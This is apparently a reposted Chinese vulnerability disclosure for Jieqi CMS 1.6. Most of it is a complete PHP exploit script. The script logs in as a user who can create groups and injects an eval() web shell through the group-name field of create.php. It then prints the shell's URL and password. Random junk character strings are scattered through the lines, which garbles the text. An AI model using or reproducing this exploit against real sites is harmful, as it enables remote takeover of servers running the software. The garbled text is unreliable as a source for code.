杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。+ _; A2 X4 ^# H7 X! J9 F! q
/ N* ^& k, d7 \8 W; w) J
( M+ z9 s( z) A% B) v该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
8 N" G0 J, c* o 需要有一个能创建圈子的用户。4 N# z1 \' F# }3 u2 f. i
3 L9 ^/ U1 z7 z( i<?php1 Y5 p+ l( g- h, r# w& Z
$ X$ Z- G. e0 k
print_r('* p: m, T# t+ z3 G3 r
+---------------------------------------------------------------------------+ v5 G1 T3 V. z3 l/ H6 q. J4 u
Jieqi CMS V1.6 PHP Code Injection Exploit# U$ g2 M% @4 N/ f3 \0 M
by flyh4t4 S4 [2 r8 {3 r6 ~, Z$ N8 v) E
mail: phpsec at hotmail dot com: v5 ]/ |8 h% r* u. b
team: http://www.wolvez.org+ m* G. t; m! r, q6 H
+---------------------------------------------------------------------------+
" Z6 _4 y: \9 u3 y: t/ T'); /**
' S4 p$ k: D, `9 Z2 f- M * works regardless of php.ini settings
9 I% S" w4 s' q2 M, l0 h/ w*/ if ($argc < 5) { print_r('# A. f$ \; F) \: Q8 x6 M2 W2 m0 d
+---------------------------------------------------------------------------+- C6 ]( L8 ?- E+ { v5 D1 E, M s
Usage: php '.$argv[0].' host path username6 I+ A3 ]$ A6 ~( s, a4 M
host: target server (ip/hostname)5 x. V) _. |( Z
path: path to jieqicms / e1 M: d9 s, Y( c+ N1 S
uasename: a username who can create group: Q. A1 J0 o3 H5 }( l
Example:! v4 q& B0 ^. q, ^3 h& {
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password' r! d. k9 C" G8 D' t0 L. T
+---------------------------------------------------------------------------+
# z4 b7 w+ z0 y3 z$ j9 l'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
2 i- O i/ j# q2 L- x2 V) ZContent-Disposition: form-data; name="gname"2 }' ]* U5 ~' |
* U4 }1 j' N+ i6 D! |, W5 U
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
. ]& w; W& J) `# I# d( h4 c-----------------------------23281168279961
* k; f" n1 A1 n F9 O) GContent-Disposition: form-data; name="gcatid"
) \2 {& Q) Z+ y7 n$ |0 a7 V+ ~
" \) K+ f; z- \4 z( L1
, ]& A/ s y8 G# m-----------------------------23281168279961
" b1 M! O, ] XContent-Disposition: form-data; name="gaudit"( {0 V& g# u; V' o
) J9 b# p0 \) h3 R
1; b2 G. O: l3 R0 F; G1 @+ d
-----------------------------23281168279961
. r( Z: }8 k* X. zContent-Disposition: form-data; name="gbrief"1 e. a& L3 r Q3 C' a3 m
! w h* q! W" s V1 I2 G4 @
1
) p* N6 `6 V' f% ^# `! Q-----------------------------23281168279961--
: U8 {" \5 L6 @1 R7 Z9 x. y'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
: G4 H& u8 T2 A+ a5 u, U4 F9 n
9 P1 u! v8 G# K5 @; B% F% |preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |